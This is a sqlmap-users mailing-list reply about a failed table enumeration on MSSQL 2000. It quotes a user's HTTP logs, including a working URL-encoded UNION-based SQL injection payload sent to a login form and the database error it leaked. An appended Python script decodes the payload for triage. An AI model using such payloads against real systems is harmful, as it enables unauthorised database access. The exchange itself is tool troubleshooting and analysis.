Re: [sqlmap-users] Injection on Post Parameter MSSQL 2000 Enumerating Tables issue
From: Miroslav S. <mir...@gm...> - 2012-02-22 06:38:23
Hi.

As there is no DBUSERNAME in the request I would say that the request is not the problem here. Now, I am interested how Havij manages it though. Is there a way for you to provide me privately with either: target url or untouched traffic file together with Burp log for Havij run against that target? Without more info I won't be able to help you more.

Kind regards,
Miroslav Stampar

On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote:

> DBUSERNAME = database user name
>
> DATABASENAME = name of the current database
>
> let me know if this is not helpful or if you need the snippet of html
> (which is just the homepage)
>
> HTTP request [#1]:
> POST /index.asp?action=auth HTTP/1.1
> Accept-Encoding: identity
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: site.com
> Accept-language: en-us,en;q=0.5
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
> Connection: close
>
> UN=admin&PW=admin&x=0&y=0
>
> HTTP response [#1] (200 OK):
> Content-length: 7091
> X-powered-by: ASP.NET
> Set-cookie: sitecom=0; path=/,
> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
> Age: 6
> Uri: http://site.com:80/index.asp?action=auth
> Server: Microsoft-IIS/6.0
> Connection: close
> Cache-control: private
> Date: Tue, 21 Feb 2012 21:15:23 GMT
> Content-type: text/html
>
> **
>
> HTML OF HOMEPAGE - if relevant will add
>
> **
>
> ############################################################################
>
> HTTP request [#2]:
> POST /index.asp?action=auth HTTP/1.1
> Accept-Encoding: identity
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: site.com
> Accept-language: en-us,en;q=0.5
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
> Connection: close
>
> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2
> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN
> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2
> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0
>
> HTTP response [#2] (500 Internal Server Error):
> Content-length: 480
> X-powered-by: ASP.NET
> Set-cookie: sitecom=0; path=/
> Age: 2
> Uri: http://www.site.com:80/index.asp?action=auth
> Server: Microsoft-IIS/6.0
> Connection: close
> Cache-control: private, no-store
> Date: Tue, 21 Feb 2012 21:15:28 GMT
> Content-type: text/html
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>
> <font face="Arial" size=2>
> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
> size=2>error '80004005'</font>
> <p>
> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in
> database 'DATABASENAME'.</font>
> <p>
> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>,
> line 16</font>
>
> ############################################################################
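
The check described in the reply, run mechanically over the logged traffic (an added example, not part of the original thread and not sqlmap code): it decodes the POST body of request #2, folds the `CHAR()` chains into readable literals, and tests which names quoted in the error text were actually sent. The function names are hypothetical; `BODY` is the request body from the quoted message with the mail client's line wraps removed.

```python
import re
from urllib.parse import parse_qs

# Body of HTTP request [#2] from the quoted message, with the mail client's
# line wraps (and their "> " markers) removed so the percent-encoding is intact.
BODY = (
    "UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29"
    "%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28"
    "%2A%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR"
    "%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20"
    "DATABASENAME..sysobjects%20INNER%20JOIN%20DATABASENAME..sysusers%20ON%20"
    "DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20"
    "DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29"
    "--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0"
)
# Error text returned in HTTP response [#2].
ERROR = "Server user 'DBUSERNAME' is not a valid user in database 'DATABASENAME'."

# \b keeps NVARCHAR(4000) from being mistaken for a CHAR(n) call.
CHAR_CHAIN = re.compile(r"\bCHAR\(\d+\)(?:\+CHAR\(\d+\))*")

def decode_param(body, name):
    """Return the URL-decoded value of one form field."""
    return parse_qs(body)[name][0]

def fold_chars(sql):
    """Rewrite CHAR(n)+CHAR(m)... chains as the string literal they build."""
    def literal(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_CHAIN.sub(literal, sql)

def referenced_objects(sql):
    """List database..object references (owner left empty) in the statement."""
    return sorted(set(re.findall(r"\b(\w+)\.\.(\w+)", sql)))

def names_from_error_in_request(error, sql):
    """For each quoted name in the error text, report whether the request sent it."""
    return {n: n in sql for n in re.findall(r"'([^']+)'", error)}

if __name__ == "__main__":
    sql = fold_chars(decode_param(BODY, "PW"))
    print(sql)
    print(referenced_objects(sql))
    print(names_from_error_in_request(ERROR, sql))
```

The same functions work on any form body taken from a proxy or web-server log, which makes a decoded, readable statement available when triaging a 500 response like the one above.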